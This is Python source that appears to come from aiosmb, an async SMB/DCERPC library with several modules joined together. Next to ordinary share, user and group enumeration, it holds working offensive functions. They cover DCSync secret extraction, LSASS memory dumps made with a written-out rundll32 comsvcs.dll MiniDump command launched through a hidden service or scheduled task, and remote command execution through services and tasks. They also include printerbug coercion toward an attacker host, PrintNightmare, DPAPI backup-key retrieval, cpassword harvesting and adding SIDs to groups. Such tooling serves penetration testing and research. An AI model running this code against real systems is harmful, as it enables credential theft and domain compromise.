				self.named_rpcs[service_name], err = await self.named_rpcs_proto[service_name].from_smbconnection(self.connection, auth_level = self.force_rpc_auth)
			else:
				self.named_rpcs[service_name] = self.named_rpcs_proto[service_name](self.connection)
				_, err = await self.named_rpcs[service_name].connect()
			if err is not None:
				raise err
			
			self.open_rpcs[service_name] = True

			return True, None
		except Exception as e:
			return False, e

	
	async def list_shares(self, fetch_share_sd = False):
		try:
			_, err = await self.connect_rpc('SRVS')
			if err is not None:
				raise err

			async for name, share_type, remark, err in self.named_rpcs['SRVS'].list_shares():
				if err is not None:
					yield None, err
					return
				share = SMBShare(
					name = name, 
					stype = share_type, 
					remark = remark, 
					fullpath = '\\\\%s\\%s' % (self.connection.target.get_hostname_or_ip(), name)
				)
				if fetch_share_sd is True:
					await share.get_security_descriptor(self.connection)

				yield share, None
		except Exception as e:
			yield None, e

	async def list_sessions(self, level = 10):
		try:
			_, err = await self.connect_rpc('SRVS')
			if err is not None:
				raise err

			async for username, ip_addr, err in self.named_rpcs['SRVS'].list_sessions(level = level):
				if err is not None:
					yield None, err
					return
				sess = SMBUserSession(username = username, ip_addr = ip_addr.replace('\\','').strip())
				self.sessions.append(sess)
				yield sess, None
		except Exception as e:
			yield None, e

	async def wkstlist_sessions(self, level = 1):
		try:
			_, err = await self.connect_rpc('WKST')
			if err is not None:
				raise err

			async for username, ip_addr, err in self.named_rpcs['WKST'].list_sessions(level = level):
				if err is not None:
					yield None, err
					return
				sess = SMBUserSession(username = username)
				self.sessions.append(sess)
				yield sess, None
		except Exception as e:
			yield None, e

	async def list_domains(self):
		try:
			_, err = await self.connect_rpc('SAMR')
			if err is not None:
				raise err
			async for domain, err in self.named_rpcs['SAMR'].list_domains():
				#self.domains.append(domain)
				yield domain, err
		except Exception as e:
			yield None, e
	
	async def list_localgroups(self):
		try:
			_, err = await self.connect_rpc('SAMR')
			if err is not None:
				raise err
			async for name, sid, err in self.list_groups('Builtin'):
				yield name, sid, err
		except Exception as e:
			yield None, None, e

	async def list_groups(self, domain_name, ret_sid = True):
		"""
		Lists all groups in a given domain.
		domain_name: string
		"""
		try:
			_, err = await self.connect_rpc('SAMR')
			if err is not None:
				raise err
			domain_sid, err = await self.named_rpcs['SAMR'].get_domain_sid(domain_name)
			if err is not None:
				raise err
			domain_handle, err = await self.named_rpcs['SAMR'].open_domain(domain_sid)
			if err is not None:
				raise err
			async for name, rid, err in self.named_rpcs['SAMR'].list_aliases(domain_handle):
				if err is not None:
					raise err
				sid = '%s-%s' % (domain_sid, rid)
				yield name, sid, None
		
		except Exception as e:
			yield None, None, e

	async def list_group_members(self, domain_name, group_name):
		try:
			_, err = await self.connect_rpc('SAMR')
			if err is not None:
				raise err
			_, err = await self.connect_rpc('LSAD')
			if err is not None:
				raise err
			policy_handle, err = await self.named_rpcs['LSAD'].open_policy2()
			if err is not None:
				raise err
			domain_sid, err = await self.named_rpcs['SAMR'].get_domain_sid(domain_name)
			if err is not None:
				raise err
			domain_handle, err = await self.named_rpcs['SAMR'].open_domain(domain_sid)
			if err is not None:
				raise err
			target_group_rid = None
			async for name, rid, err in self.named_rpcs['SAMR'].list_aliases(domain_handle):
				if err is not None:
					raise err
				if name == group_name:
					target_group_rid = rid
					break

			if target_group_rid is None:
				raise Exception('No group found with name "%s"' % group_name)
			
			alias_handle, err = await self.named_rpcs['SAMR'].open_alias(domain_handle, target_group_rid)
			if err is not None:
				raise err

			async for sid, err in self.named_rpcs['SAMR'].list_alias_members(alias_handle):
				if err is not None:
					raise err
				
				async for domain_name, user_name, err in self.named_rpcs['LSAD'].lookup_sids(policy_handle, [sid]):
					if err is not None:
						raise err
					yield domain_name, user_name, sid, None
		
		except Exception as e:
			yield None, None, None, e

	async def add_sid_to_group(self, domain_name, group_name, sid):
		try:
			_, err = await self.connect_rpc('SAMR')
			if err is not None:
				raise err
			_, err = await self.connect_rpc('LSAD')
			if err is not None:
				raise err
			policy_handle, err = await self.named_rpcs['LSAD'].open_policy2()
			if err is not None:
				raise err
			domain_sid, err = await self.named_rpcs['SAMR'].get_domain_sid(domain_name)
			if err is not None:
				raise err
			domain_handle, err = await self.named_rpcs['SAMR'].open_domain(domain_sid)
			if err is not None:
				raise err
			target_group_rid = None
			async for name, rid, err in self.named_rpcs['SAMR'].list_aliases(domain_handle):
				if err is not None:
					raise err

				if name == group_name:
					target_group_rid = rid
					break

			if target_group_rid is None:
				raise Exception('No group found with name "%s"' % group_name)
			
			alias_handle, err = await self.named_rpcs['SAMR'].open_alias(domain_handle, target_group_rid)
			if err is not None:
				raise err
			targetsid = RPC_SID()
			targetsid.fromCanonical(sid)
			result, err = await self.named_rpcs['SAMR'].add_member_to_alias(alias_handle, targetsid)
			if err is not None:
				raise err
			return result, None
		except Exception as e:
			return False, e		

	async def list_directory(self, directory):
		_, err = await directory.list(self.connection)
		if err is not None:
			yield False, err
			return
		
		for entry in directory.get_console_output():
			yield entry

	async def enum_all_recursively(self, depth = 3, maxentries = None, exclude_share=['print$', 'PRINT$'], exclude_dir=[], fetch_share_sd = False, fetch_dir_sd = False, fetch_file_sd = False):
		shares = {}
		async for share, err in self.list_shares(fetch_share_sd):
			if err is not None:
				raise err
			if share.name.upper() == 'IPC$':
				continue
			shares[share.name] = share
			yield share, 'share', None

		for share_name in shares:
			if share_name in exclude_share:
				continue

			_, err = await shares[share_name].connect(self.connection)
			if err is not None:
				continue
				raise err

			async for entry in shares[share_name].subdirs[''].list_r(self.connection, depth = depth, maxentries = maxentries, fetch_dir_sd = fetch_dir_sd, fetch_file_sd = fetch_file_sd, exclude_dir = exclude_dir):
				yield entry
				await asyncio.sleep(0)
	
	async def enum_files_with_filter(self, filter_cb):
		shares = {}
		async for share, err in self.list_shares():
			if err is not None:
				raise err
			shares[share.name] = share
			yield share, 'share', None

		for share_name in shares:
			res = await filter_cb('sharename', share_name)
			if res is False:
				continue

			_, err = await shares[share_name].connect(self.connection)
			if err is not None:
				continue
			
			res = await filter_cb('share', shares[share_name])
			if res is False:
				continue

			async for entry in shares[share_name].subdirs[''].list_r(self.connection, depth = 1000, maxentries = -1, filter_cb = filter_cb):
				yield entry
				await asyncio.sleep(0)

	async def put_file(self, local_path, remote_path):
		"""
		remote_path must be a full UNC path with the file name included!

		"""
		try:
			smbfile = SMBFile.from_remotepath(self.connection, remote_path)
			_, err = await smbfile.open(self.connection, 'w')
			if err is not None:
				return False, err

			with open(local_path, 'rb') as f:
				total_writen, err = await smbfile.write_buffer(f)

			await smbfile.close()
			return total_writen, None
		except Exception as e:
			return False, e

	async def get_file(self, out_path, file_obj):
		with open(out_path, 'wb') as f:
			try:
				await file_obj.open(self.connection, 'r')
				while True:
					data = await file_obj.read(1024)
					if not data:
						break
					f.write(data)
			finally:
				await file_obj.close()

	async def get_file_data(self, file_obj):
		_, err = await file_obj.open(self.connection, 'r')
		if err is not None:
			yield None, err
			return
		async for data, err in file_obj.read_chunked():
			yield data, err

	async def del_file(self, file_path):
		return await SMBFile.delete_rempath(self.connection, file_path)
	
	async def del_directory_path(self, dir_path):
		return await SMBDirectory.delete_unc(self.connection, dir_path)

	async def create_subdirectory(self, directory_name, parent_directory_obj):
		await parent_directory_obj.create_subdir(directory_name, self.connection)
		

	async def list_services(self):
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err
			
			async for service, err in self.named_rpcs['SERVICEMGR'].list():
				if err is not None:
					raise err
				yield service, None
		
		except Exception as e:
			yield None, e

	async def enable_service(self, service_name):
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err

			res, exc = await self.named_rpcs['SERVICEMGR'].enable_service(service_name)
			return res, exc
		except Exception as e:
			return None, e

	async def list_domain_users(self, target_domain = None):
		try:
			_, err = await self.connect_rpc('SAMR')
			if err is not None:
				raise err

			if target_domain is None:
				logger.debug('No domain defined, fetching it from SAMR')
						
								
				logger.debug('Fetching domains...')
				async for domain, err in self.named_rpcs['SAMR'].list_domains():
					if err is not None:
						raise err

					if domain == 'Builtin':
						continue
					if target_domain is None: #using th first available
						target_domain = domain
						logger.debug('Domain available: %s' % domain)

			domain_sid, err = await self.named_rpcs['SAMR'].get_domain_sid(target_domain)
			if err is not None:
				raise err
			domain_handle, err = await self.named_rpcs['SAMR'].open_domain(domain_sid)
			if err is not None:
				raise err
			
			async for username, user_sid, err in self.named_rpcs['SAMR'].list_domain_users(domain_handle):
				yield username, user_sid, err
		
		except Exception as e:
			yield None, None, e

	async def dcsync(self, target_domain = None, target_users = []):
		try:
			if isinstance(target_users, str):
				target_users = [target_users]
			
			_, err = await self.connect_rpc('SAMR')
			if err is not None:
				raise err
			

			if target_domain is None:
				logger.debug('No domain defined, fetching it from SAMR')
				
				logger.debug('Fetching domains...')
				async for domain, err in self.named_rpcs['SAMR'].list_domains():
					if err is not None:
						raise err
					if domain == 'Builtin':
						continue
					if target_domain is None: #using th first available
						target_domain = domain
						logger.debug('Domain available: %s' % domain)
			
			drsuapi, err = await DRSUAPIRPC.from_smbconnection(self.connection, domain = target_domain)
			if err is not None:
				raise err

			async with drsuapi:
				logger.debug('Using domain: %s' % target_domain)
				if len(target_users) > 0:
					for username in target_users:
						secrets, err = await drsuapi.get_user_secrets(username)
						yield secrets, err
								
				else:
					
					domain_sid, err = await self.named_rpcs['SAMR'].get_domain_sid(target_domain)
					if err is not None:
						raise err
					domain_handle, err = await self.named_rpcs['SAMR'].open_domain(domain_sid)
					if err is not None:
						raise err
					async for username, user_sid, err in self.named_rpcs['SAMR'].list_domain_users(domain_handle):
						if err is not None:
							yield None, err
							return
						logger.debug('username: %s' % username)
						secrets, err = await drsuapi.get_user_secrets(username)
						if err is not None:
							yield None, err
							return
						logger.debug('secrets: %s' % secrets)
						yield secrets, None

		except Exception as e:
			yield None, e
			return

	
	async def get_regapi(self):
		try:
			_, err = await self.connect_rpc('RRP')
			if err is not None:
				raise err
			return self.named_rpcs['RRP'], None
		except Exception as e:
			return None, e

	async def save_registry_hive(self, hive_name, remote_path):
		try:
			_, err = await self.connect_rpc('RRP')
			if err is not None:
				raise err
			key_handle, err = await self.named_rpcs['RRP'].OpenRegPath(hive_name)
			if err is not None:
				return None, err
			res, err = await self.named_rpcs['RRP'].SaveKey(key_handle, remote_path)
			return res, err
		except Exception as e:
			return None, e

	async def reg_list_users(self):
		"""
		Lists user SIDs available in the HKLM\\USERS hive
		"""
		try:
			_, err = await self.connect_rpc('RRP')
			if err is not None:
				raise err

			users, err = await self.named_rpcs['RRP'].ListUsers()
			if err is not None:
				return None, err
			return users, err
		except Exception as e:
			return None, e
		
	
	async def service_dump_lsass(self, lsass_file_name = None, silent = False):
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err

			if lsass_file_name is None:
				lsass_file_name = os.urandom(4).hex() + '.arj'
			command = "powershell.exe -NoP -C \"%%windir%%\\System32\\rundll32.exe %%windir%%\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id \\Windows\\Temp\\%s full;Wait-Process -Id (Get-Process rundll32).id\"" % lsass_file_name
			service_name = os.urandom(4).hex()
			display_name = service_name

			batch_file = os.urandom(4).hex() + '.bat'
			#totally not from impacket
			command = '%%COMSPEC%% /Q /c echo %s  2^>^&1 > %s & %%COMSPEC%% /Q /c %s & del %s' % (command, batch_file, batch_file, batch_file)

			logger.debug('Service: %s' % service_name)
			logger.debug('Command: %s' % command)
			#return None, None
		
			res, err = await self.named_rpcs['SERVICEMGR'].create_service(service_name, display_name, command, scmr.SERVICE_DEMAND_START)
			if err is not None:
				raise err
			
			if silent is False:
				if self.print_cb is not None:
					await self.print_cb('[%s] Service created with name: %s' % (self.connection.target.get_hostname_or_ip(), service_name))
				else:
					print('[%s] Service created with name: %s' % (self.connection.target.get_hostname_or_ip(), service_name))
			
			_, err = await self.start_service(service_name)

			for _ in range(5):
				await asyncio.sleep(5)
				temp = SMBFile.from_remotepath(self.connection, '\\ADMIN$\\Temp\\%s' % lsass_file_name)
				_, err = await temp.open(self.connection)
				if err is not None:
					continue
				if silent is False:
					if self.print_cb is not None:
						await self.print_cb('[%s] Dump file is now accessible here: C:\\Windows\\Temp\\%s' % (self.connection.target.get_hostname_or_ip(), lsass_file_name))
					else:
						print('[%s] Dump file is now accessible here: C:\\Windows\\Temp\\%s' % (self.connection.target.get_hostname_or_ip(), lsass_file_name))
				return temp, None

			return None, err
		except Exception as e:
			return None, e
		finally:
			_, err = await self.delete_service(service_name)
			if err is not None:
				logger.debug('Failed to delete service!')
				if silent is False:
					if self.print_cb is not None:
						await self.print_cb('[%s] Failed to remove service: %s' % (self.connection.target.get_hostname_or_ip(), service_name))
					else:
						print('[%s] Failed to remove service: %s' % (self.connection.target.get_hostname_or_ip(), service_name))
			else:
				if silent is False:
					if self.print_cb is not None:
						await self.print_cb('[%s] Removed service: %s' % (self.connection.target.get_hostname_or_ip(), service_name))
					else:
						print('[%s] Removed service: %s' % (self.connection.target.get_hostname_or_ip(), service_name))

	
	async def service_cmd_exec(self, command, display_name = None, service_name = None, result_wait_timeout = 1):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		
		try:
			handle, err = await self.named_rpcs_proto['SERVICEMGR'].from_smbconnection(self.connection, auth_level = self.force_rpc_auth)
			if err is not None:
				raise err

			if service_name is None:
				service_name = os.urandom(4).hex()
			if display_name is None:
				display_name = service_name

			batch_file = os.urandom(4).hex() + '.bat'
			temp_file_name = os.urandom(4).hex()
			temp_file_location = '\\ADMIN$\\temp\\%s' % temp_file_name
			temp_location = '%%windir%%\\temp\\%s' % (temp_file_name)

			#totally not from impacket
			command = '%%COMSPEC%% /Q /c echo %s  ^>  %s 2^>^&1 > %s & %%COMSPEC%% /Q /c %s & del %s' % (command, temp_location, batch_file, batch_file, batch_file)

			logger.debug('Command: %s' % command)

		
			res, err = await handle.create_service(service_name, display_name, command, scmr.SERVICE_DEMAND_START)
			if err is not None:
				raise err
			
			#logger.debug('Service created. Name: %s' % service_name)
			print('Service created. Name: %s' % service_name)
			
			_, err = await handle.start_service(service_name)
			#if err is not None:
			#	raise err

			err = None
			for _ in range(5):
				logger.debug('Opening temp file. Path: %s' % temp_file_location)
				temp = SMBFile.from_remotepath(self.connection, temp_file_location)
				_, err = await temp.open(self.connection)
				if err is not None:
					await asyncio.sleep(result_wait_timeout)
					continue
				break
			else:
				raise err

			async for data, err in temp.read_chunked():
				if err is not None:
					logger.debug('Temp file read failed!')
					raise err
				if data is None:
					break

				yield data, err
			
			await handle.close()

			logger.debug('Deleting service...')
			_, err = await handle.delete_service(service_name)
			if err is not None:
				logger.warning('Failed to delete service!')

			logger.debug('Deleting temp file...')
			_, err = await temp.delete()
			if err is not None:
				logger.warning('Failed to delete temp file!')

			yield None, None

		except Exception as e:
			yield None, e
	
	async def create_service(self, service_name, command, display_name = None, starttype = scmr.SERVICE_AUTO_START):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err

			if display_name is None:
				display_name = service_name
			res, err = await self.named_rpcs['SERVICEMGR'].create_service(service_name, display_name, command, starttype = starttype)
			return res, err
		except Exception as e:
			return None, e

	async def start_service(self, service_name):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err
			return await self.named_rpcs['SERVICEMGR'].start_service(service_name)
		except Exception as e:
			return None, e
	
	async def stop_service(self, service_name):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err
			return await self.named_rpcs['SERVICEMGR'].stop_service(service_name)
		except Exception as e:
			return None, e
	
	async def delete_service(self, service_name):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err
			return await self.named_rpcs['SERVICEMGR'].delete_service(service_name)
		except Exception as e:
			return None, e


	async def deploy_service(self, path_to_executable, remote_path = None, service_name = None):
		"""

		remote path must be UNC
		"""
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err

			if service_name is None:
				service_name = os.urandom(4).hex()
			if remote_path is None:
				raise NotImplementedError()

			filename = ntpath.basename(path_to_executable)
			remote_file_path = remote_path + filename
			remote_file = SMBFile.from_uncpath(remote_file_path)
			await self.put_file(path_to_executable, remote_file)
			
			command = remote_file_path

			await self.create_service(service_name, command)

			return True, None
		except Exception as e:
			return None, e
	

	async def tasks_list(self):
		"""
		Lists scheduled tasks
		"""
		try:
			_, err = await self.connect_rpc('TSCH')
			if err is not None:
				raise err
			async for task, err in self.named_rpcs['TSCH'].list_tasks():
				yield task, err
		except Exception as e:
			yield None, e

	async def tasks_register(self, template, task_name = None, flags = tsch.TASK_CREATE, sddl = None, logon_type = tsch.TASK_LOGON_NONE):
		"""
		Registers a new task
		"""
		try:
			_, err = await self.connect_rpc('TSCH')
			if err is not None:
				raise err

			return await self.named_rpcs['TSCH'].register_task(template, task_name = task_name, flags = flags, sddl = sddl, logon_type = logon_type)
		except Exception as e:
			return None, e


	async def tasks_execute_commands(self, commands):
		try:
			_, err = await self.connect_rpc('TSCH')
			if err is not None:
				raise err

			return await self.named_rpcs['TSCH'].run_commands(commands)
		except Exception as e:
			return None, e
	
	async def tasks_cmd_exec(self, command, result_wait_timeout = 1):
		try:
			_, err = await self.connect_rpc('TSCH')
			if err is not None:
				raise err

			temp_file_name = os.urandom(4).hex()
			temp_file_location = '\\ADMIN$\\temp\\%s' % temp_file_name
			temp_location = '%%windir%%\\temp\\%s' % (temp_file_name)

			if self.print_cb is not None:
				await self.print_cb('[%s] Temp file location: %s' % (self.connection.target.get_hostname_or_ip(), temp_location))

			#totally not from impacket
			command = '%s  >  %s 2>&1' % (command, temp_location)

			logger.debug('Command: %s' % command)
			if self.print_cb is not None:
				await self.print_cb('[%s] Registering new task and executing command...' % self.connection.target.get_hostname_or_ip())

			res, err = await self.named_rpcs['TSCH'].run_commands([command])
			if err is not None:
				raise err
			
			if self.print_cb is not None:
				await self.print_cb('[%s] Task executed OK! Waiting for output file' % self.connection.target.get_hostname_or_ip())
			
			err = None
			for _ in range(10):
				logger.debug('Opening temp file. Path: %s' % temp_file_location)
				temp = SMBFile.from_remotepath(self.connection, temp_file_location)
				_, err = await temp.open(self.connection)
				if err is not None:
					await asyncio.sleep(result_wait_timeout)
					continue
				break
			else:
				raise err

			if self.print_cb is not None:
				await self.print_cb('[%s] Got output file, reading...' % self.connection.target.get_hostname_or_ip())
			async for data, err in temp.read_chunked():
				if err is not None:
					logger.debug('Temp file read failed!')
					raise err
				if data is None:
					break

				yield data, err
			
			logger.debug('Deleting temp file...')
			if self.print_cb is not None:
				await self.print_cb('[%s] Deleting temp file...' % self.connection.target.get_hostname_or_ip())
			_, err = await temp.delete()
			if err is not None:
				logger.debug('Failed to delete temp file!')
				if self.print_cb is not None:
					await self.print_cb('[%s] Failed to delete temp file!' % self.connection.target.get_hostname_or_ip())
			
			yield None, None

		except Exception as e:
			yield None, e

	async def tasks_delete(self, task_name):
		try:
			_, err = await self.connect_rpc('TSCH')
			if err is not None:
				raise err
			
			return await self.named_rpcs['TSCH'].delete_task(task_name)
		except Exception as e:
			return None, e

	
	async def task_dump_lsass(self, lsass_file_name = None, silent = False):
		try:
			_, err = await self.connect_rpc('TSCH')
			if err is not None:
				raise err
			if lsass_file_name is None:
				lsass_file_name = os.urandom(4).hex() + '.arj'
			command = "powershell.exe -NoP -C \"%%windir%%\\System32\\rundll32.exe %%windir%%\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id \\Windows\\Temp\\%s full;Wait-Process -Id (Get-Process rundll32).id\"" % lsass_file_name

			logger.debug('Command: %s' % command)
			
			res, err = await self.tasks_execute_commands([command])
			if err is not None:
				raise err
			
			if silent is False:
				if self.print_cb is not None:
					await self.print_cb('[%s] Dumping task created on remote end, now waiting...' % self.connection.target.get_hostname_or_ip())
				else:
					print('[%s] Dumping task created on remote end, now waiting...' % self.connection.target.get_hostname_or_ip())

			for _ in range(5):
				await asyncio.sleep(5)
				temp = SMBFile.from_remotepath(self.connection, '\\ADMIN$\\Temp\\%s' % lsass_file_name)
				_, err = await temp.open(self.connection)
				if err is not None:
					continue
				if silent is False:
					if self.print_cb is not None:
						await self.print_cb('[%s] Remote file location: C:\\Windows\\Temp\\%s' % (self.connection.target.get_hostname_or_ip() ,lsass_file_name))
					else:
						print('[%s] Remote file location: C:\\Windows\\Temp\\%s' % (self.connection.target.get_hostname_or_ip() ,lsass_file_name))
				return temp, None

			return None, err
		except Exception as e:
			return None, e

	async def printerbug(self, attacker_host):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		try:
			_, err = await self.connect_rpc('RPRN')
			if err is not None:
				raise err

			if self.print_cb is not None:
				await self.print_cb('opening printer')
			else:
				print('opening printer')
			handle, err = await self.named_rpcs['RPRN'].open_printer('\\\\%s\x00' % self.connection.target.get_hostname_or_ip())
			if err is not None:
				raise err
			resp, err = await self.named_rpcs['RPRN'].hRpcRemoteFindFirstPrinterChangeNotificationEx(
				handle,
				PRINTER_CHANGE_ADD_JOB,
				pszLocalMachine = '\\\\%s\x00' % attacker_host,

			)
			if err is not None:
				raise err
			return True, None
		except Exception as e:
			return None, e
	
	
	async def enum_printer_drivers(self, environments = "Windows x64", level = 2, name = ''):
		try:
			_, err = await self.connect_rpc('RPRN')
			if err is not None:
				raise err
			return await self.named_rpcs['RPRN'].enum_drivers(environments, level = level, name = name)
		except Exception as e:
			return None, e

	async def printnightmare(self, share, driverpath, environments = "Windows x64", silent= False):
		try:
			_, err = await self.connect_rpc('RPRN')
			if err is not None:
				raise err
			return await self.named_rpcs['RPRN'].printnightmare(share, driverpath = driverpath, environments = environments, silent = silent)
		except Exception as e:
			return None, e

	async def par_printnightmare(self, share, driverpath, environments = "Windows x64", silent= False):
		try:
			_, err = await self.connect_rpc('PAR')
			if err is not None:
				raise err
			return await self.named_rpcs['PAR'].printnightmare(share, driverpath = driverpath, environments = environments, silent = silent)
		except Exception as e:
			return None, e

	async def list_interfaces(self):
		try:
			interfaces = []
			ipc_file = SMBFile.from_uncpath('\\\\%s\\IPC$' % self.connection.target.get_hostname_or_ip())
			await ipc_file.open(self.connection, 'r')
			ifaces_raw, err = await self.connection.ioctl(ipc_file.tree_id, b'\xFF'*16, CtlCode.FSCTL_QUERY_NETWORK_INTERFACE_INFO, data = None, flags = IOCTLREQFlags.IS_FSCTL)
			if err is not None:
				raise err

			for iface_raw in ifaces_raw:
				t = {
					'index' : iface_raw.IfIndex,
					'cap' : iface_raw.Capability,
					'speed' : iface_raw.LinkSpeed,
					'address' : str(iface_raw.SockAddr_Storage.Addr),
				}
				interfaces.append(t)
			
			return interfaces, None


		except Exception as e:
			return None, e

		finally:
			await ipc_file.close()
	
	async def check_service_status(self, service_name):
		try:
			_, err = await self.connect_rpc('SERVICEMGR')
			if err is not None:
				raise err
			return await self.named_rpcs['SERVICEMGR'].check_service_status(service_name)
		except Exception as e:
			return None, e
	
	async def get_backupkeys(self):
		try:
			_, err = await self.connect_rpc('LSAD')
			if err is not None:
				raise err
			return await self.named_rpcs['LSAD'].get_backupkeys()
		except Exception as e:
			return None, e
	
	async def get_cpasswd(self, depth = 5):
		async for filename, username, cpassword, xmltype, err in find_cpasswd(self.connection, depth = 5):
			yield filename, username, cpassword, xmltype, err
		
	
#	"""
#	fpath
#	fname
#	ext
#	size
#	creationtime
#	content
#	"""
#	
#	async def search(self, depth = 3, maxentries = None, exclude_share=['print$', 'PRINT$'], exclude_dir=[]):
#		try:
#			async for obj, otype, err in self.enum_all_recursively(self,  fetch_share_sd = False, fetch_dir_sd = False, fetch_file_sd = False):
#				if otype != 'file':
#					continue
#
#				share, 'share', None
#
#		except Exception as e:
#			return None, e
#	
#
#	#### TODO SECTION
#
#	async def list_mountpoints(self):
#		pass
#	
#class FileFilter:
#	def __init__(self):
#		self.fname = None
#		self.size = None
#		self.creationtime = None
#		self.content = None
#		self.matchcase = False
#	
#	async def filter(self, fileobj:SMBFile, fcontent = None):
#		try:
#			fname_matches = True
#			size_matches = True
#			if self.fname is not None:
#				fname_matches = False
#				fname_matches = fnmatch.fnmatch(fileobj.fullpath, self.fname)
#				if self.matchcase is False:
#					fname_matches = fnmatch.fnmatchcase(fileobj.fullpath, self.fname)				
#				
#			if self.size is not None:
#				size_matches = False
#				if self.size.startswith('<=') is True:
#					size = int(self.size[2:])
#					if fileobj.size <= size:
#						size_matches = True
#				elif self.size.startswith('>=') is True:
#					size = int(self.size[2:])
#					if fileobj.size >= size:
#						size_matches = True
#				elif self.size.startswith('==') is True:
#					size = int(self.size[2:])
#					if fileobj.size == size:
#						size_matches = True
#				elif self.size[0] == '=' is True:
#					size = int(self.size[1:])
#					if fileobj.size == size:
#						size_matches = True
#			
#			
#				
#			
#
#
#
#
#		except Exception as e:
#			return None, None, None, e




import asyncio
import uuid


class ListTargetGen:
	def __init__(self, targets, with_id = False):
		self.targets = targets
		self.with_id = with_id

	async def run(self, target_q):
		try:
			cnt = 0
			for tres in self.targets:
				if self.with_id is True:
					tid, target = tres
				else:
					tid = str(uuid.uuid4())
					target = tres
				cnt += 1
				await target_q.put((tid,target))
				await asyncio.sleep(0)
			return cnt, None
		except Exception as e:
			return cnt, e
	
	


from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5 import samr
from aiosmb.dcerpc.v5.dtypes import RPC_SID, DACL_SECURITY_INFORMATION
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb import logger
import traceback
from aiosmb.commons.utils.extb import pprint_exc
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE

class SAMRRPC:
	def __init__(self):
		self.service_pipename = r'\samr'
		self.service_uuid = samr.MSRPC_UUID_SAMR
		self.dce = None
		self.handle = None
		
		self.domain_ids = {} #sid to RPC_SID
		self.domain_handles = {} #handle to sid
		
		self.user_handles = {} #handle to domain-sid
		self.alias_handles = {} #handle to domain-sid
		
	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = SAMRRPC()
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P 
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(service.service_uuid)
			if err is not None:
				raise err
			
			if open is True:
				_, err = await service.open()
				if err is not None:
					raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			if auth_level is None:
				#for SMB connection no extra auth needed
				auth_level = RPC_C_AUTHN_LEVEL_NONE
			rpctransport = SMBDCEFactory(connection, filename=SAMRRPC().service_pipename)		
			service, err = await SAMRRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
	
	async def open(self):
		if not self.dce:
			_, err = await self.connect()
			if err is not None:
				raise err

		ans, err = await samr.hSamrConnect(self.dce)
		if err is not None:
			raise err

		self.handle = ans['ServerHandle']

		return True,None
	
	async def close(self):
		if self.dce:
			for dhandle in self.domain_handles:
				try:
					await self.close_handle(dhandle)
				except:
					pass
					
			for uhandle in self.user_handles:
				try:
					await self.close_handle(uhandle)
				except:
					pass
			
			try:
				await self.close_handle(self.handle)
			except:
				pass
				
			try:
				await self.dce.disconnect()
			except:
				pass
		
		return True,None
		
	async def close_handle(self, handle):
		resp, err = await samr.hSamrCloseHandle(self.dce, handle)
		if err is not None:
			return None, err
		return resp, None
	
	async def get_info(self, domain_handle, domainInformationClass = samr.DOMAIN_INFORMATION_CLASS.DomainGeneralInformation2):
		resp, err = await samr.hSamrQueryInformationDomain(self.dce, domain_handle, domainInformationClass = domainInformationClass)
		if err is not None:
			return None, err
		return resp, None
	
	async def list_domains(self):
		try:
			status = NTStatus.MORE_ENTRIES
			enumerationContext = 0
			while status == NTStatus.MORE_ENTRIES:
				resp, err = await samr.hSamrEnumerateDomainsInSamServer(self.dce, self.handle, enumerationContext = enumerationContext)
				if err is not None:
					if err.error_code != NTStatus.MORE_ENTRIES.value:
						raise err
					resp = err.get_packet()
				
				for domain in resp['Buffer']['Buffer']:
					yield domain['Name'], None
				
				enumerationContext = resp['EnumerationContext']
				status = NTStatus(resp['ErrorCode'])
		except Exception as e:
			yield None, e
	
